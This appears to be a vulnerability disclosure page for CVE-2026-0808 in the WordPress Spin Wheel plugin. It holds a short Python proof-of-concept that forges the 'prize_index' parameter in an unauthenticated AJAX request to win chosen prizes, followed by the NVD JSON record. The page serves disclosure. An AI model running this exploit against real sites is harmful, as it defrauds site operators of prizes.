CVE-2026-0808

import requests # CVE-2026-0808 PoC - Spin Wheel Prize Manipulation # Target: WordPress site with Spin Wheel plugin <= 2.1.0 target_url = "http://target-wordpress-site.com/" ajax_endpoint = target_url + "wp-admin/admin-ajax.php" # Step 1: Identify the prize indices by analyzing the plugin's prize configuration # Prize indices typically start from 0 (e.g., 0, 1, 2, 3...) # Step 2: Intercept a normal spin request and modify the prize_index parameter payload = { "action": "swp_spin_wheel", "prize_index": "0", # Change this to target high-value prize index "nonce": "attacker_provided_or_empty" } # Step 3: Send the manipulated request response = requests.post(ajax_endpoint, data=payload) print(f"Response Status: {response.status_code}") print(f"Response Content: {response.text}") # Expected result: Win the prize at the specified index # Modify prize_index value (e.g., 0, 1, 2) to target different prizes # Higher value prizes are typically at lower index positions

{"cve": {"id": "CVE-2026-0808", "sourceIdentifier": "[email protected]", "published": "2026-01-17T07:16:02.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Spin Wheel plugin for WordPress is vulnerable to client-side prize manipulation in all versions up to, and including, 2.1.0. This is due to the plugin trusting client-supplied prize selection data without server-side validation or randomization. This makes it possible for unauthenticated attackers to manipulate which prize they win by modifying the 'prize_index' parameter sent to the server, allowing them to always select the most valuable prizes."}, {"lang": "es", "value": "El plugin Spin Wheel para WordPress es vulnerable a la manipulación de premios del lado del cliente en todas las versiones hasta la 2.1.0, inclusive. Esto se debe a que el plugin confía en los datos de selección de premios proporcionados por el cliente sin validación o aleatorización del lado del servidor. Esto hace posible que atacantes no autenticados manipulen qué premio ganan modificando el parámetro 'prize_index' enviado al servidor, permitiéndoles seleccionar siempre los premios más valiosos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/spin-wheel/tags/2.0.2/includes/class-swp-ajax.php#L73", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/spin-wheel/trunk/includes/class-swp-ajax.php#L73", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437726%40spin-wheel&new=3437726%40spin-wheel&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c023b91e-f633-41a6-b2d7-bcb3f1d026b7?source=cve", "source": "[email protected]"}]}}